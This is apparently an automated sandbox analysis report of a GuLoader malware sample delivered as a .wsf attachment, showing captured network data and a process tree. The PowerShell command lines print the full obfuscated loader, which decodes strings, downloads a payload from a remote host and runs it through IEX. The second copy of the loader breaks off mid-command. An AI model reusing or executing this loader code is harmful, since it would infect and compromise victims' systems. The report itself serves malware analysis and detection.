                        Data Ascii: GSFflnk5xMwyzMYz75HbpMB96LFHw0E5BxHaJ0y3iFxw4VrpygASoQXe5P/HjITNhcaGB4TGaJtOv0RZDPHVjGI8GLPlDqnvEqpLvPEmCxyxtaGpqSiGiVkpxMlZKcTJWSnEyVkpxMlZKcTMehyfwnbla9GyKk+KEEU38aTlv2rPRhxyBgnUyVekgxl5IVwYeQnEwsQf3maV6E9ontZpDPLE41wAf3idF9N4AeBlPgG/C4I/o24
                        Oct 8, 2024 10:59:47.403479099 CEST1236INData Raw: 72 6f 44 49 4f 59 2f 78 57 51 61 4a 72 6f 56 69 6a 45 6b 6c 33 45 6f 77 6b 46 46 52 52 35 47 4c 30 6c 78 52 32 2f 4c 59 30 4f 72 68 52 52 31 32 2f 43 72 73 76 7a 4e 2f 4e 78 52 52 52 56 30 72 31 32 51 42 32 37 53 70 42 4e 6b 42 79 4e 4a 76 33 31
                        Data Ascii: roDIOY/xWQaJroVijEkl3EowkFFRR5GL0lxR2/LY0OrhRR12/CrsvzN/NxRRRV0r12QB27SpBNkByNJv31T78pR79Igsgo/MVa/RYF30UGZdvXrVAlJyI7FusLb7mccDM8x1JYf8j56j8DQBPGGQFnl5KcQ5SOuEyVkpxMlZKcTJWSnEyVkpxMlZKcL3mh19+InZ2/15KcTJWSnEyVkpxMlZKcTJWSnEyV3J3CR9PUFOWiBkTeo
                        Oct 8, 2024 10:59:47.403513908 CEST672INData Raw: 31 48 45 37 30 64 65 4c 45 45 39 73 34 37 2b 74 6a 35 67 72 51 56 77 51 71 54 6e 45 77 73 41 35 64 4b 59 70 32 63 57 4c 47 53 6e 45 79 56 6b 70 78 4d 6c 5a 4b 63 54 4a 57 53 6e 45 79 56 6b 70 78 4d 6c 63 2b 37 76 72 54 39 55 72 38 34 45 33 55 47
                        Data Ascii: 1HE70deLEE9s47+tj5grQVwQqTnEwsA5dKYp2cWLGSnEyVkpxMlZKcTJWSnEyVkpxMlc+7vrT9Ur84E3UGyR9vzXwNtVBAE1027zFNHR4fA02Vksrye3duBxRkBz9f4x2iCknNGRRUtgqMicvQHHWdewj0pZPqkVoEY6mm8p61nsVAfzYFqgesBW4E+t7M+IbZjpNwvpFh514QQ8O6UJbCHi+pbXECE3YD4plxzWd+5H4/xADFc
                        Oct 8, 2024 10:59:47.403544903 CEST1236INData Raw: 35 64 6c 51 58 78 78 4e 46 55 46 2f 73 51 51 38 5a 30 59 63 33 4d 39 4b 37 67 52 53 32 67 53 70 4e 77 56 4b 66 72 73 6c 43 67 71 56 44 4a 6c 42 46 4a 55 55 52 46 72 42 79 71 32 6d 39 31 79 4e 64 41 70 4a 2f 4d 42 43 78 41 45 37 2b 37 5a 75 39 6f
                        Data Ascii: 5dlQXxxNFUF/sQQ8Z0Yc3M9K7gRS2gSpNwVKfrslCgqVDJlBFJUURFrByq2m91yNdApJ/MBCxAE7+7Zu9oYRy9nc3yEIquDlIl7c6RLCTKHaeTpcfyFFEKwa2Ok0xKSJxMlZKcTJWSnEyVkpxMlZKcTJWS0vwUwUobo0sqWPmeiL6VAA5XSp7zbPfCs/LkwRfRCJOcTP3Jst7XGwFNl5KcQ1Kk9UyVkpxMlZKcTJWSnEyVkpxMl
                        Oct 8, 2024 10:59:47.403578043 CEST1236INData Raw: 56 6b 32 53 52 72 48 62 75 34 6c 2f 33 78 46 48 33 44 73 4f 4e 54 48 59 73 47 69 51 64 5a 78 77 34 56 72 70 79 6f 41 53 6f 51 53 75 4e 6d 30 7a 57 52 56 63 62 2b 68 31 48 34 62 48 6a 6c 36 34 7a 30 41 62 51 76 35 77 67 2f 47 4e 41 33 42 57 65 4d
                        Data Ascii: Vk2SRrHbu4l/3xFH3DsONTHYsGiQdZxw4VrpyoASoQSuNm0zWRVcb+h1H4bHjl64z0AbQv5wg/GNA3BWeMmAZUl5yQWY3oE05gqk94yVG8AuAqFG2uSs9lXkVqebITFL64PHgHz4AXFFsdEbJq8DM1OWS65wMRJqV4MrfoLwOjBZIeBwouwUFrhw0+LMrghCHf1TLGvgaVepeDkZKTTEvenEyVkpxMlZKcTJWSnEyVkpxMlZLM0
                        Oct 8, 2024 10:59:47.403609991 CEST1236INData Raw: 68 79 6a 71 4d 55 65 53 37 64 75 30 55 64 70 36 32 41 75 6f 41 63 69 53 70 64 35 79 41 51 63 38 70 51 69 59 74 6f 57 4a 53 7a 75 38 41 52 78 6a 78 70 42 75 33 59 65 4f 41 31 6b 72 50 79 2b 61 4d 2f 4a 38 4f 37 43 64 32 75 49 52 66 70 2b 51 66 72
                        Data Ascii: hyjqMUeS7du0Udp62AuoAciSpd5yAQc8pQiYtoWJSzu8ARxjxpBu3YeOA1krPy+aM/J8O7Cd2uIRfp+QfrUKbOE3MU97dmgBEclWf9eSH24Zg8tBzW6wfZgNPZ+SfkErKSRn3C1BtBRESlsh4v7E6VkulimpPJTJWSnEyVkpxMlZKcTJWSnEyVkpxMwaMN6cMoSv2vdpp8owmmzVp6asKRksvz0tFBhxRlXeCp3h2L74OCNMcOF
                        Oct 8, 2024 10:59:47.403645039 CEST1236INData Raw: 59 58 76 35 30 65 4c 36 32 39 77 53 38 54 58 6d 72 57 43 37 54 4e 5a 32 61 6a 49 6e 6b 54 62 76 66 5a 32 70 50 46 72 37 49 73 35 32 51 30 71 69 75 32 46 72 63 6a 33 49 66 67 53 2f 69 51 73 39 5a 31 65 49 63 42 56 73 7a 47 49 58 6c 38 6b 43 35 63
                        Data Ascii: YXv50eL629wS8TXmrWC7TNZ2ajInkTbvfZ2pPFr7Is52Q0qiu2Frcj3IfgS/iQs9Z1eIcBVszGIXl8kC5ceRSuyZIIX5alO0s9OKAWHBcbTZWSk01i7JxMlZKcTJWSnEyVkpxMlZKcTJWSwV4W5wakIkUVtMUZGcuUkpyApoxLhI09llgmuDjtQZbluDbod4MD2ZYDwXulmonsXgKHeIyjeuqlQyivOa4WhixZQJ1bf7GSnEyVk
                        Oct 8, 2024 10:59:47.408705950 CEST1236INData Raw: 68 32 4f 76 62 64 41 43 48 66 56 4f 77 4b 56 6e 6d 51 5a 64 63 4a 68 72 34 52 55 37 48 50 47 78 6d 72 6c 4a 4b 63 51 36 65 49 66 45 79 56 6b 70 78 4d 6c 5a 4b 63 54 4a 57 53 6e 45 79 56 6b 70 78 4d 6c 5a 4b 63 42 6d 76 37 37 5a 64 42 59 64 71 36
                        Data Ascii: h2OvbdACHfVOwKVnmQZdcJhr4RU7HPGxmrlJKcQ6eIfEyVkpxMlZKcTJWSnEyVkpxMlZKcBmv77ZdBYdq6rRBCYIBJSugFz9RNueqGk/Pzfr9fgiQXQ+lSGyqSx6YCE3OP8S0SzWIXsd3QE2v0TynQGgkbek2rD/rJR+ysYpICIEvIRDdmTR3HvMU/rJ1zX6NprtwlDq75G7gUYS/z4u4YzfseJzOG38/gO/f9hfOrXxLzq18To


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:04:59:16
                        Start date:08/10/2024
                        Path:C:\Windows\System32\wscript.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Prosba o oferte.wsf"
                        Imagebase:0x7ff7d5c10000
                        File size:170'496 bytes
                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:1
                        Start time:04:59:17
                        Start date:08/10/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c ping 6777.6777.6777.677e
                        Imagebase:0x7ff6fa110000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:2
                        Start time:04:59:17
                        Start date:08/10/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:3
                        Start time:04:59:17
                        Start date:08/10/2024
                        Path:C:\Windows\System32\PING.EXE
                        Wow64 process (32bit):false
                        Commandline:ping 6777.6777.6777.677e
                        Imagebase:0x7ff69b2d0000
                        File size:22'528 bytes
                        MD5 hash:2F46799D79D22AC72C241EC0322B011D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        General

                        Target ID:4
                        Start time:04:59:19
                        Start date:08/10/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser Allodialist Amanist Lydkilden Bortvejrede Peristole #>;$Occipitobregmatic=$Recrate149+$host.'PrivateData';If ($Occipitobregmatic) {$Rykkendes++;}function Ridsning89($Kabine){$Tardy=$Gehejmeraaden+$Kabine.Length-$Rykkendes; for( $Antilogarithmic=7;$Antilogarithmic -lt $Tardy;$Antilogarithmic+=8){$Achim='Filterbredders';$Molition+=$Kabine[$Antilogarithmic];$Facetter='Krigserklringer';}$Molition;}function Ruttendes80($Driftsregnskabet){ & ($Ansgningsfristen151) ($Driftsregnskabet);}$Nondiffusible=Ridsning89 'M.urernM Hem,meoAlfaderzHexin,niTingsvil Platonlsk ddera V nero/Dublan 5 Dumpek.Fisende0 Van.it Ostrace( Penc lW Sever,i Sym olnSkoles.dNonubiqoMissilswH,dderrsListles Semi acNlivegenT ,istol Mngder 1Habitus0strandf.Pronoun0 Unloqu;Wh tero RundsaWOpprioriEroderinNjesb,g6Maatter4Gerning;Rekrter VillaexGydning6Rensni,4Barrica;Undisc Foggi r luorev Noelge: Ytri.g1Humors 2Underho1Chrysa .Knivsme0Triker,) kademi postedGSelvbyge jergarcIndtagekSh ndyioUn easi/Per ore2airchec0Konform1Subtrak0Afvegne0Coloniz1 Is,ide0Moviepk1 Bovrup SkrudsaFUngoadeiDyslysirKonstrueF rekomfSteto koHydr baxOrkidxj/ So,ial1Turbomo2Banc,dr1 Doozie. E ilog0Polyaem ';$enere=Ridsning89 'BoningeUSmmomets Forthce ReinfurCirc mv-.oninteaGlairiegTitt pye Duss sNLinuxwit emul e ';$oversaettelser=Ridsning89 ' Temp lhTilendetFagretltjuleferpSuissef: andomr/ nthrac/ AvidlysBaldakiiPodargilFiletfai FlaxwonFerskvaalycop rsIndes.rt akettr.OdisblarKatedero Anfgte/CausticKSuboperoOverfrimElf nbemUnd.rstu unmaknToneskiiDementek Loc,moutransmut AfgoereTillg brR turnenPregalve FagidisDisarti.Rettetai DebetsnBarneskf Hj,rpe ';$Rustrdes=Ridsning89 'Snrkled>Kol nna ';$Ansgningsfristen151=Ridsning89 'AdmittaIGtesengEB talinXShownce ';$Lifefully169='forvrredes';$Fagbog='\Selvsikkerhedens.Pan';Ruttendes80 (Ridsning89 'Rygskca$KonomiigBughindLSpoonfuoAf ekslbInduk,iATehtterL Un ors:Uskad la Kont ar Mora deTjen.reN CompriIPo eredG Una so=Strappa$StttekrELampetcNTrenchaV Af.ejs:UdringeaImmunogpRullersPGa enesdStraffoAOp egniTFuracioACloques+Tredve.$Rec iliFOverskgaBogach gSwaverpBSexsymbOOrgueslGNazdrow ');Ruttendes80 (Ridsning89 'Satinsk$Po encegCol,barlSecretiO UltrasbRampageAFumlendL Ompo t:Solariur Vel,ilePaaklisMSidstemiForblfnsHeteroteQuadruprStandarNbroderiEXiphipl=Unpatri$CuttlefoZ.braerv ppositE N gaciRbnk bids Dwe.leAHolbaekeSo,brreTOralizeTPlia.tnEOmvurd l SysselsBrintboEHym.ariRforsker..almoniS Monu,epN.tlistLMycof oIsubricttBajadse(formule$Bra.skoremotiviuKowbirdsisnenneT torherROverid.dFrowsilED.ctyopSstre.kd) Maskab ');Ruttendes80 (Ridsning89 ',rindeh[ TrypaonT rolsueFiligratM,ltino.BeratedsvgaviseeKadrernr arneruVArtesynIPreexpec iretogeOpodidyPTriang,OSkattemiHankytoNAfvarsltFissio.muigenneAOverflyNOutrowsa FortriGOffertoEEksponer housli]Distill:Vaadesk:DagbrknS rchiepEDampskic roniseuSidereaRPineryaIVrist utr publiyAppre,up D.emakRJaguaroOHestehatGenerelODoggylacBlou,ieOStrubehlU unsti Recreme=Middelh Iglerne[CheviotnMesologeberapnitSu dogc.Syr,pliS eleddeeSelvsikc Unex,rudownpourGeswarpIWorktimtPulic dyNonrecip,aandopR Limed,O ,bessiTCirkeleOP.oduktCPudsekaODromiciLForfristStencilY colossPButterpEUndercr]Salmary:Isa,xet:UnsuccuTKonditeLRishiseSDeplace1ma tful2 ridine ');$oversaettelser=$remiserne[0];$Polymorphosis=(Ridsning89 'Bar alo$Steens.G EpilogL CheckmOschellaBMiljan AAn sogel Dur ps:TelefonOAdvokatcOriginiCE,genesaAptianaSSamhrig= FelthrNSpleni eLinie,ewBehfter-JagtregoTantal b StrengJBara keEslidstrCComma,pTSu.rhom estoves AntimeY SaloonsDefilertAnt,chaeDobbeltMAfgifts. An.misnAfmaalieSkovsneTPa.fyld.Matten WQuotedrEdi tionBAdminisc acteriLMeltablIKarpetvePremonsN uperiotIon xal ');Ruttendes80 ($Polymorphosis);Ruttendes80 (Ridsning89 ' Sjleg.$UrinemiO SalgspcPoternec teniniagrovelisRedunda.Polic.hHRandruseo ationaKova endBreathfeSomret r bygg,lsvidende[Sikkerh$udse deeWarti en PhasmaeLngdespr Non ere yetstr]dolmere=Afsonin$SeriefrN TemanuoSj krinnmodta edSorbedsi ActionfCommutefho rorouNi kroksIntestaiAleiptebSporvoglPaladineKarakte ');$Jobskabelsesordninger=Ridsning89 ' Thalam$UnameliOTekstmncBedrevncCrochetaLibatins Bleph .FlertalDHelvedeoFiredrawTumulosnAlkars l ForeigofilicinaForstasd CrimelFcostoc,iMickla lPara heeAlmi de(Isogen $UnderekoAllerstv RelubreStopklor KeelmasStone raSpidsbueGran patQua,rint Nat raelaceratlRegenersH nfreleSko emorProc am,Embed.m$P anineSDafniercSnuses oPandekat,ipakvatAffjed i N vnef) Bu ble ';$Scotti=$Arenig;Ruttendes80 (Ridsning89 'Bedst v$ GrundvgPunkerwlv lutaro PharynbResolveAHighfalLPrecom.:GoaleeaMAdlayflECharrosSHelmi,tO Ra.bitCStabensaTilbehrr RedimeD Gethesi O formUtchaderMSepiaer= Ast ol(AstrochtSjuskemeTommeskSFronts,tInertia-DruggerpSmaakraA PentasTPseudochembedsf Pingpon$kuldsejsRegalebCKolportOTordenkTPopularTNebengei Vergeh),predtl ');while (!$Mesocardium) {Ruttendes80 (Ridsning89 'Cambric$GalantegU roduklIulid no MorakkbSkjaldeaBugginglTrochle:PirnedkC Corr.laPrelimilcontekev FilmfeaElektrodSheenieoSammenssUnsoci eEmbedmer Arbejd=Tro aer$BlypeistStribedrdepreciu AntiloeBirdymu ') ;Ruttendes80 $Jobskabelsesordninger;Ruttendes80 (Ridsning89 ' ProcessNrsy etTTran meA Mo regr almiakTNeu,osu-Pa apsysUorga iLVom srueIn.ylice TenorsPCracksk Ebionit4 Py tru ');Ruttendes80 (Ridsning89 ' anhan$ressourgHovedvelDemogoroFamilieBMohammeAS.yringlKonkurs:TarmacmMHyperpiEObloquiS SolsikoFugtig cTornensaReloaneRContribDPo tanviDemograuQueniteMIndilat=rdskres(Tungekat.hanneleLunelseSEchino,tunm sse-StreungP,reddesA Sol tiTGatfinnHescapes Rsonnre$ netkorsTjanserCmisa.phOKasikumTUntuneatMiljoe iImp.ctf)Tiltruk ') ;Ruttendes80 (Ridsning89 'Faareky$ Span ggKom.eteL GrevinoUnder tBM sterkAHexactdLBasunki:Svale,rrProat eSPseudomt synk.o=Vrngend$HypothegCelado LG ecingOGrovderb Fr.gtfAPandoorlArbej.s:S ejlmohCurliewO EnolizvVankelmE Sa dviDRegulatsMeritleTreadornDAcetateE.rmorinRAppr xinLangtfreVoldgif+ Theopn+Bl,nder%B erska$Hjer,evrPopsieseBr sekam Emi,teI aldernsTio ontEkagedejRC.tronsnIntertreAmbitio. remkalCTopiadeoNdlsninURevengenKraitsgtPhoma e ') ;$oversaettelser=$remiserne[$Rst];}$Tttedes=326639;$saltene=34997;Ruttendes80 (Ridsning89 ' Readab$ mediefGSkonn.rLOmvurdeOVejrforbSoudanoaIscenesLSmu dre:Addit rgPeripr aT yrocoLArchpriGHomoaniaBuggysblRhi oth2Udvande1Doltish2Danaide Argesta= uanaju BoligakGMingledePecksbrTForthca- agstagCDirektoo HurtignInnobedTKrig skEBeneficnAdopt.vTAgrosto Grssers$MorfinrsstatsobcFrem igoDronte T,anonesT SkydeliAfkogen ');Ruttendes80 (Ridsning89 'oejentr$Til.varg EnhalolLangesso S oldibPedun uaDdse,stlPinlige:BlddeleSAdopt,vkPre ispr AnglicmMnemotekCr zadooI,putterGanespat Dollfie So emitH potrasDertilh Pre.ect=Gudfryg Nyans t[PanorerS,ildoesy diculesS lstictStatio eHomeoidmNyttepl.Hov.dmnCStepninoOrganisnKrrers,vUrbicole GlandurDynamogtUmuligg]venc.es: Apo.op:Stu.gerFBrode irNonk nfo,rosciemRescuerBAmati oa aveates Immunoe Grever6Appeten4UndergiSBldtes.t ungramrma tynii Omkar.nBydren gIndsben(grazess$SygejouGDisacc aAfhngiglFolkebigBen alsaKartof lGardebr2Vilif e1Pseudob2Ratifik) Unretr ');Ruttendes80 (Ridsning89 'Sk ated$Musophag Fu ktiLF itageoUnshameb SyllabaPre bytLKlangen:preoccupVinduesR.oodleaOTantaluJRefereneK,stterk ArchemTsupermomMarlberAKaramboGBumbasseBusmanfrSideganE Hypo iN.lhoppe Sharif=Olmintr Cateri [LaanernSS.ingomYA ticapsHolosyst Civil EW enersMNaphtha.Coked fTDis.quiE Temp,rxSymptomT Demihe.Phello ECymosebn EmulsiCUdvikliOLethargDProvan ICo.loqunBi.liotG Frilag]Overmod: Ov.rho:TrstespANo icess B.ggemCRudime,iDiauli,i Arbejd.ConnectgbibliogeSwitcheT CephalstrykknaTT levierS gganpI BebyrdnTrsterngSugem,k( Thia e$Stra leSScheelikGravsknR drulnmDobbeltkOenomanoTumu.usR Som.dato dkritE PengestP.raconsordstrr)Garring ');Ruttendes80 (Ridsning89 'Kultu.e$SovjetrGFlys.yrlChauvinOO.ertrdbSludderA HanderLRoadrun: For ulf CamelkURn eboenC.maenvN KakerleChemehuLudsvednFScru.uloOpsttecRFemma tML gerva= Bystat$ ndiscpS,ruktuRDataselOVibrahaJHyperdoE GyritsK Bagkl tTrk uglMBan eorA ThemedgH spitaeG ksporRFremtidEMajonseNDomsafs.demetonS Ded.cnU Peake bKons rusun.erviTKaritt R illedIBage,psNprecisigVirksom(Skaberi$AfstrafTUrb nisTAdanfejTConominEScar dldPalu amE Un bsts trafi , Michel$UdstansS elotaAPrgt gel DolomitEjeresuE Eftergn HalvtieNonreti)Udbring ');Ruttendes80 $Funnelform;"
                        Imagebase:0x7ff788560000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2131900489.000002CC94CF3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:5
                        Start time:04:59:19
                        Start date:08/10/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:9
                        Start time:04:59:51
                        Start date:08/10/2024
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#nettenes Semipopular overstates Photodrome #>;$Lighedsideologis='Omrrer';<#Arbejdsbevgelser Allodialist Amanist Lydkilden Bortvejrede Peristole #>;$Occipitobregmatic=$Recrate149+$host.'PrivateData';If ($Occipitobregmatic) {$Rykkendes++;}function Ridsning89($Kabine){$Tardy=$Gehejmeraaden+$Kabine.Length-$Rykkendes; for( $Antilogarithmic=7;$Antilogarithmic -lt $Tardy;$Antilogarithmic+=8){$Achim='Filterbredders';$Molition+=$Kabine[$Antilogarithmic];$Facetter='Krigserklringer';}$Molition;}function Ruttendes80($Driftsregnskabet){ & ($Ansgningsfristen151) ($Driftsregnskabet);}$Nondiffusible=Ridsning89 'M.urernM Hem,meoAlfaderzHexin,niTingsvil Platonlsk ddera V nero/Dublan 5 Dumpek.Fisende0 Van.it Ostrace( Penc lW Sever,i Sym olnSkoles.dNonubiqoMissilswH,dderrsListles Semi acNlivegenT ,istol Mngder 1Habitus0strandf.Pronoun0 Unloqu;Wh tero RundsaWOpprioriEroderinNjesb,g6Maatter4Gerning;Rekrter VillaexGydning6Rensni,4Barrica;Undisc Foggi r luorev Noelge: Ytri.g1Humors 2Underho1Chrysa .Knivsme0Triker,) kademi postedGSelvbyge jergarcIndtagekSh ndyioUn easi/Per ore2airchec0Konform1Subtrak0Afvegne0Coloniz1 Is,ide0Moviepk1 Bovrup SkrudsaFUngoadeiDyslysirKonstrueF rekomfSteto koHydr baxOrkidxj/ So,ial1Turbomo2Banc,dr1 Doozie. E ilog0Polyaem ';$enere=Ridsning89 'BoningeUSmmomets Forthce ReinfurCirc mv-.oninteaGlairiegTitt pye Duss sNLinuxwit emul e ';$oversaettelser=Ridsning89 ' Temp lhTilendetFagretltjuleferpSuissef: andomr/ nthrac/ AvidlysBaldakiiPodargilFiletfai FlaxwonFerskvaalycop rsIndes.rt akettr.OdisblarKatedero Anfgte/CausticKSuboperoOverfrimElf nbemUnd.rstu unmaknToneskiiDementek Loc,moutransmut AfgoereTillg brR turnenPregalve FagidisDisarti.Rettetai DebetsnBarneskf Hj,rpe ';$Rustrdes=Ridsning89 'Snrkled>Kol nna ';$Ansgningsfristen151=Ridsning89 'AdmittaIGtesengEB talinXShownce ';$Lifefully169='forvrredes';$Fagbog='\Selvsikkerhedens.Pan';Ruttendes80 (Ridsning89 'Rygskca$KonomiigBughindLSpoonfuoAf ekslbInduk,iATehtterL Un ors:Uskad la Kont ar Mora deTjen.reN CompriIPo eredG Una so=Strappa$StttekrELampetcNTrenchaV Af.ejs:UdringeaImmunogpRullersPGa enesdStraffoAOp egniTFuracioACloques+Tredve.$Rec iliFOverskgaBogach gSwaverpBSexsymbOOrgueslGNazdrow ');Ruttendes80 (Ridsning89 'Satinsk$Po encegCol,barlSecretiO UltrasbRampageAFumlendL Ompo t:Solariur Vel,ilePaaklisMSidstemiForblfnsHeteroteQuadruprStandarNbroderiEXiphipl=Unpatri$CuttlefoZ.braerv ppositE N gaciRbnk bids Dwe.leAHolbaekeSo,brreTOralizeTPlia.tnEOmvurd l SysselsBrintboEHym.ariRforsker..almoniS Monu,epN.tlistLMycof oIsubricttBajadse(formule$Bra.skoremotiviuKowbirdsisnenneT torherROverid.dFrowsilED.ctyopSstre.kd) Maskab ');Ruttendes80 (Ridsning89 ',rindeh[ TrypaonT rolsueFiligratM,ltino.BeratedsvgaviseeKadrernr arneruVArtesynIPreexpec iretogeOpodidyPTriang,OSkattemiHankytoNAfvarsltFissio.muigenneAOverflyNOutrowsa FortriGOffertoEEksponer housli]Distill:Vaadesk:DagbrknS rchiepEDampskic roniseuSidereaRPineryaIVrist utr publiyAppre,up D.emakRJaguaroOHestehatGenerelODoggylacBlou,ieOStrubehlU unsti Recreme=Middelh Iglerne[CheviotnMesologeberapnitSu dogc.Syr,pliS eleddeeSelvsikc Unex,rudownpourGeswarpIWorktimtPulic dyNonrecip,aandopR Limed,O ,bessiTCirkeleOP.oduktCPudsekaODromiciLForfristStencilY colossPButterpEUndercr]Salmary:Isa,xet:UnsuccuTKonditeLRishiseSDeplace1ma tful2 ridine ');$oversaettelser=$remiserne[0];$Polymorphosis=(Ridsning89 'Bar alo$Steens.G EpilogL CheckmOschellaBMiljan AAn sogel Dur ps:TelefonOAdvokatcOriginiCE,genesaAptianaSSamhrig= FelthrNSpleni eLinie,ewBehfter-JagtregoTantal b StrengJBara keEslidstrCComma,pTSu.rhom estoves AntimeY SaloonsDefilertAnt,chaeDobbeltMAfgifts. An.misnAfmaalieSkovsneTPa.fyld.Matten WQuotedrEdi tionBAdminisc acteriLMeltablIKarpetvePremonsN uperiotIon xal ');Ruttendes80 ($Polymorphosis);Ruttendes80 (Ridsning89 ' Sjleg.$UrinemiO SalgspcPoternec teniniagrovelisRedunda.Polic.hHRandruseo ationaKova endBreathfeSomret r bygg,lsvidende[Sikkerh$udse deeWarti en PhasmaeLngdespr Non ere yetstr]dolmere=Afsonin$SeriefrN TemanuoSj krinnmodta edSorbedsi ActionfCommutefho rorouNi kroksIntestaiAleiptebSporvoglPaladineKarakte ');$Jobskabelsesordninger=Ridsning89 ' Thalam$UnameliOTekstmncBedrevncCrochetaLibatins Bleph .FlertalDHelvedeoFiredrawTumulosnAlkars l ForeigofilicinaForstasd CrimelFcostoc,iMickla lPara heeAlmi de(Isogen $UnderekoAllerstv RelubreStopklor KeelmasStone raSpidsbueGran patQua,rint Nat raelaceratlRegenersH nfreleSko emorProc am,Embed.m$P anineSDafniercSnuses oPandekat,ipakvatAffjed i N vnef) Bu ble ';$Scotti=$Arenig;Ruttendes80 (Ridsning89 'Bedst v$ GrundvgPunkerwlv lutaro PharynbResolveAHighfalLPrecom.:GoaleeaMAdlayflECharrosSHelmi,tO Ra.bitCStabensaTilbehrr RedimeD Gethesi O formUtchaderMSepiaer= Ast ol(AstrochtSjuskemeTommeskSFronts,tInertia-DruggerpSmaakraA PentasTPseudochembedsf Pingpon$kuldsejsRegalebCKolportOTordenkTPopularTNebengei Vergeh),predtl ');while (!$Mesocardium) {Ruttendes80 (Ridsning89 'Cambric$GalantegU roduklIulid no MorakkbSkjaldeaBugginglTrochle:PirnedkC Corr.laPrelimilcontekev FilmfeaElektrodSheenieoSammenssUnsoci eEmbedmer Arbejd=Tro aer$BlypeistStribedrdepreciu AntiloeBirdymu ') ;Ruttendes80 $Jobskabelsesordninger;Ruttendes80 (Ridsning89 ' ProcessNrsy etTTran meA Mo regr almiakTNeu,osu-Pa apsysUorga iLVom srueIn.ylice TenorsPCracksk Ebionit4 Py tru ');Ruttendes80 (Ridsning89 ' anhan$ressourgHovedvelDemogoroFamilieBMohammeAS.yringlKonkurs:TarmacmMHyperpiEObloquiS SolsikoFugtig cTornensaReloaneRContribDPo tanviDemograuQueniteMIndilat=rdskres(Tungekat.hanneleLunelseSEchino,tunm sse-StreungP,reddesA Sol tiTGatfinnHescapes Rsonnre$ netkorsTjanserCmisa.phOKasikumTUntuneatMiljoe iImp.ctf)Tiltruk ') ;Ruttendes80 (Ridsning89 'Faareky$ Span ggKom.eteL GrevinoUnder tBM sterkAHexactdLBasunki:Svale,rrProat eSPseudomt synk.o=Vrngend$HypothegCelado LG ecingOGrovderb Fr.gtfAPandoorlArbej.s:S ejlmohCurliewO EnolizvVankelmE Sa dviDRegulatsMeritleTreadornDAcetateE.rmorinRAppr xinLangtfreVoldgif+ Theopn+Bl,nder%B erska$Hjer,evrPopsieseBr sekam Emi,teI aldernsTio ontEkagedejRC.tronsnIntertreAmbitio. remkalCTopiadeoNdlsninURevengenKraitsgtPhoma e ') ;$oversaettelser=$remiserne[$Rst];}$Tttedes=326639;$saltene=34997;Ruttendes80 (Ridsning89 ' Readab$ mediefGSkonn.rLOmvurdeOVejrforbSoudanoaIscenesLSmu dre:Addit rgPeripr aT yrocoLArchpriGHomoaniaBuggysblRhi oth2Udvande1Doltish2Danaide Argesta= uanaju BoligakGMingledePecksbrTForthca- agstagCDirektoo HurtignInnobedTKrig skEBeneficnAdopt.vTAgrosto Grssers$MorfinrsstatsobcFrem igoDronte T,anonesT SkydeliAfkogen ');Ruttendes80 (Ridsning89 'oejentr$Til.varg EnhalolLangesso S oldibPedun uaDdse,stlPinlige:BlddeleSAdopt,vkPre ispr AnglicmMnemotekCr zadooI,putterGanespat Dollfie So emitH potrasDertilh Pre.ect=Gudfryg Nyans t[PanorerS,ildoesy diculesS lstictStatio eHomeoidmNyttepl.Hov.dmnCStepninoOrganisnKrrers,vUrbicole GlandurDynamogtUmuligg]venc.es: Apo.op:Stu.gerFBrode irNonk nfo,rosciemRescuerBAmati oa aveates Immunoe Grever6Appeten4UndergiSBldtes.t ungramrma tynii Omkar.nBydren gIndsben(grazess$SygejouGDisacc aAfhngiglFolkebigBen alsaKartof lGardebr2Vilif e1Pseudob2Ratifik) Unretr ');Ruttendes80 (Ridsning89 'Sk ated$Musophag Fu ktiLF itageoUnshameb SyllabaPre bytLKlangen:preoccupVinduesR.oodleaOTantaluJRefereneK,stterk ArchemTsupermomMarlberAKaramboGBumbasseBusmanfrSideganE Hypo iN.lhoppe 